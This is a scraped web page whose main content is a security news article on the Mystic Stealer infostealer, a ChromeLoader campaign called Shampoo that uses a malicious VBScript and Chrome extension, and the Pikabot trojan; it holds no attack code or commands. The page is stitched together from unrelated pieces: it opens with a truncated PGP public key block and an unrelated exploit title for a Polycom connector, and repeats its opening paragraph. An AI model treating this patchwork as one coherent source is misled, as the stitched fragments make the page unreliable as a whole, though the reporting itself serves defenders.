BLOCK-----xjMEYgzK+BYJKwYBBAHaRw8BAQdAuvqLumsJp8MYs+ccGRDNptLpiXET6kQ4EMSQm0+K1kbNGEJVRyA8c2VjYnVnczNAZ21haWwuY29tPsKLBBMWCAAzFiEEVFMxXX78QbIacMz7MuWgzP7on3UFAmIMyvgCGwMFCwkIBwIGFQgJCgsCBRYCAwEAAAoJEDLloMz+6J91RUwBAKYGAZ6fDeCVFckLBYJtAOfapZOkqtxsyPkWH2nI4nOOAP40wwVTHhF+/KzlydxgZeWSFisfQiG4/gKee8TOfp7LDc44BGIMyvkSCisGAQQBl1UBBQEBB0Bao5PIrX/c+RguQIRDZ0FRnigzTdRS1970qRbrlxUIBAMBCAfCeAQYFggAIBYhBFRTMV1+/EGyGnDM+zLloMz+6J91BQJiDMr5AhsMAAoJEDLloMz+6J91OIkA/iS1KwXlgE28cwK3PyPvNe7Jv5E+HXb3lXVxMe63iKdsAP94dozMMgIPdTHXU8LXxkR/YPBCvA4bkQ9SA37Ak2UDDg===6VCh-----END PGP PUBLIC KEY BLOCK-----

Polycom BToE Connector 4.4.0.0 Buffer Overflow / Man-In-The-Middle

A new information-stealing malware called Mystic Stealer has been found to steal data from about 40 different web browsers and over 70 web browser extensions.
First advertised on April 25, 2023, for $150 per month, the malware also targets cryptocurrency wallets, Steam, and Telegram, and employs extensive mechanisms to resist analysis.
"The code is heavily obfuscated making use of polymorphic

A new information-stealing malware called **Mystic Stealer** has been found to steal data from about 40 different web browsers and over 70 web browser extensions.

First advertised on April 25, 2023, for $150 per month, the malware also targets cryptocurrency wallets, Steam, and Telegram, and employs extensive mechanisms to resist analysis.

"The code is heavily obfuscated making use of polymorphic string obfuscation, hash-based import resolution, and runtime calculation of constants," InQuest and Zscaler researchers said in an analysis published last week.

Mystic Stealer, like many other crimeware solutions that are offered for sale, focuses on pilfering data and is implemented in the C programming language. The control panel has been developed using Python.

Updates to the malware in May 2023 incorporate a loader component that allows it to retrieve and execute next-stage payloads fetched from a command-and-control (C2) server, making it a more formidable threat.

C2 communications are achieved using a custom binary protocol over TCP. As many as 50 operational C2 servers have been identified to date. The control panel, for its part, serves as the interface for buyers of the stealer to access data logs and other configurations.

Cybersecurity firm Cyfirma, which published a concurrent analysis of Mystic, said, "the author of the product openly invites suggestions for additional improvements in the stealer" through a dedicated Telegram channel, indicating active efforts to court the cybercriminal community.

"It seems clear that the developer of Mystic Stealer is looking to produce a stealer on par with the current trends of the malware space while attempting to focus on anti-analysis and defense evasion," the researchers said.

The findings come as infostealers have emerged as a hot commodity in the underground economy, often serving as the precursor by facilitating the collection of credentials to enable initial access into target environments.

Put differently, stealers are used as a foundation by other cybercriminals to launch financially motivated campaigns that employ ransomware and data extortion elements.

The spike in popularity notwithstanding, off-the-shelf stealer malware are not being marketed at affordable prices to appeal to a wider audience, they are also evolving to become more lethal, packing in advanced techniques to fly under the radar.

The ever-evolving and volatile nature of the stealer universe is best exemplified by the steady introduction of new strains such as Album Stealer, Bandit Stealer, Devopt, Fractureiser, and Rhadamanthys in recent months.

In a further sign of threat actor's attempts to evade detection, information stealers and remote access trojans have been observed packaged within crypters like AceCryptor, ScrubCrypt (aka BatCloak), and Snip3.

The development also comes as HP Wolf Security detailed a March 2023 ChromeLoader campaign codenamed Shampoo that's engineered to install a malicious extension in Google Chrome and steal sensitive data, redirect searches, and inject ads into a victim's browser session.

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

"Users encountered the malware mainly from downloading illegal content, such as movies (Cocaine Bear.vbs), video games, or other," security researcher Jack Royer said. "These websites trick victims into running a malicious VBScript on their PCs that triggers the infection chain."

The VBScript then proceeds to launch PowerShell code capable of terminating all existing Chrome windows and opening a new session with the unpacked rogue extension using the "\--load-extension" command line argument.

It also follows the discovery of a new modular malware trojan christened Pikabot that has the ability to execute arbitrary commands and inject payloads that are provided by a C2 server, such as Cobalt Strike.

The implant, active since early 2023, has been found to share resemblances with QBot with regard to distribution methods, campaigns, and malware behaviors, although there is no conclusive evidence connecting the two families.

"Pikabot is a new malware family that implements an extensive set of anti-analysis techniques and offers common backdoor capabilities to load shellcode and execute arbitrary second-stage binaries," Zscaler said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows